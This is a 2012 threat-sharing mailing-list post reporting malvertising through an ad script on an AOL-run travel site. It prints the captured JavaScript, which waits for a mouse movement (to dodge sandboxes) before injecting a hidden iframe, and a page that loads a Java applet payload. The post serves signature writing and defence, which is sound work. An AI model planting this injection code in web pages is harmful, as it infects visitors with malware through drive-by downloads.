[Emerging-Sigs] [PHI] [Domain Keys] Blackhole served via Yahoo

Nathan nathan at packetmail.net
Mon Dec 17 09:57:17 HAST 2012


Got hits on http://blogsmithmedia.net/Java.jar in the last 10 minutes or so.  Looks like
malvertising from a 1px iframe.  How is this trash still allowed?  In my capture it
comes in through http://blogsmithmedia.net/ads.min.js, included from a gadling.com
page (the referrer in the proxy log below) whose footer is AOL's.
AOL?

    © 2012 AOL Inc. All rights Reserved. <a
href="http://privacy.aol.com/">Privacy Policy</a>
    | <a href="http://legal.aol.com/TOS">Terms of Use</a>
    | <a href="http://about.aol.com/aolnetwork/trademarks">Trademarks</a>
    | <a href="http://help.aol.com">AOL A-Z HELP</a>
    | <a href="http://advertising.aol.com/brands/gadling">Advertise With Us</a>
    | <a href="http://adinfo.aol.com/about-our-ads/">About Our Ads</a>
</p><script type="text/javascript"
src="http://blogsmithmedia.net/ads.min.js"></script>



[17/Dec/2012:12:07:01 -0700] 
200	971	text/javascript	http://blogsmithmedia.net/ads.min.js	http://www.gadling.com/2012/12/07/a-solo-stroll-through-baghdad/?icid=maing-grid7%7Cmaing5%7Cdl13%7Csec1_lnk3%26pLid%3D245264

[17/Dec/2012:12:07:02 -0700] 
200	150	text/html	http://blogsmithmedia.net/nav.php	http://www.gadling.com/2012/12/07/a-solo-stroll-through-baghdad/?icid=maing-grid7%7Cmaing5%7Cdl13%7Csec1_lnk3%26pLid%3D245264

[17/Dec/2012:12:07:04 -0700] 
200	2903	application/octet-stream	http://blogsmithmedia.net/Java.jar	-

##Body## (decoded ads.min.js body from the 12:07:01 request above; the nav.php response it pulls in follows further down)

// Captured body of http://blogsmithmedia.net/ads.min.js (971 bytes,
// text/javascript, per the proxy log above). The bytes before `var` on the
// next line appear to be capture/extraction residue, not script as served --
// keep them in mind when writing a content match on this sample.
// Cross-browser event helpers: standards addEventListener/removeEventListener
// when present, otherwise IE's attachEvent/detachEvent with an 'on' prefix.
~.l.3...P.A.....var addListener, removeListener;
if (document.addEventListener) {
    addListener = function (el, evt, f) { return el.addEventListener(evt, f,
false); };
    removeListener = function (el, evt, f) { return el.removeEventListener(evt,
f, false); };
} else {
    // Legacy IE path (no addEventListener available).
    addListener = function (el, evt, f) { return el.attachEvent('on' + evt, f);
};
    removeListener = function (el, evt, f) { return el.detachEvent('on' + evt,
f); };
}

// One-shot mousemove handler: detaches itself on the first event, then injects
// a hidden 50x40 iframe pointing at nav.php -- the page that, per the response
// captured below, serves the 0x0 <applet> loading Java.jar.
// NOTE(review): because injection waits for a real mouse event, a headless
// fetch of the page with no synthesized input never requests nav.php; replay
// or sandbox analysis must dispatch a mousemove to reach the payload. This
// reads as crawler/sandbox evasion, so signatures should key on ads.min.js
// itself rather than on seeing nav.php in the same session.
var myListener = function () {
    removeListener(document, 'mousemove', myListener);  // fire exactly once
        var cdn = document.createElement('div');
        cdn.style.zIndex = -1;              // stacked behind page content
        cdn.style.visibility = 'hidden';    // never visible to the user
        cdn.style.position = 'absolute';    // takes no layout space
        cdn.style.width = '50px';
        cdn.style.height = '40px';
        // The line break inside this string literal is e-mail wrapping of the
        // capture, not part of the script as served.
        cdn.innerHTML = '<iframe width="50" height="40" frameborder="0"
scrolling="no" src="http://blogsmithmedia.net/nav.php"></iframe>';
        if (document.body != null){ document.body.appendChild(cdn); }
};

addListener(document, 'mousemove', myListener);


HTTP/1.1 200 OK
Age: 0
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV
TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL
UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Date: Mon, 17 Dec 2012 19:07:02 GMT
Server: YTS/1.19.11
Set-Cookie: BX=aapp1018curam&b=3&s=55; expires=Tue, 02-Jun-2037 20:00:00 GMT;
path=/; domain=.blogsmithmedia.net
Content-Type: text/html
Proxy-Connection: Keep-Alive
Transfer-Encoding: chunked

<iframe width="1" height="1" frameborder="0"></iframe><applet width="0px"
height="0px" code="Java.class" archive="Java.jar" name="AOL, Inc."></applet>

Thanks,
Nathan



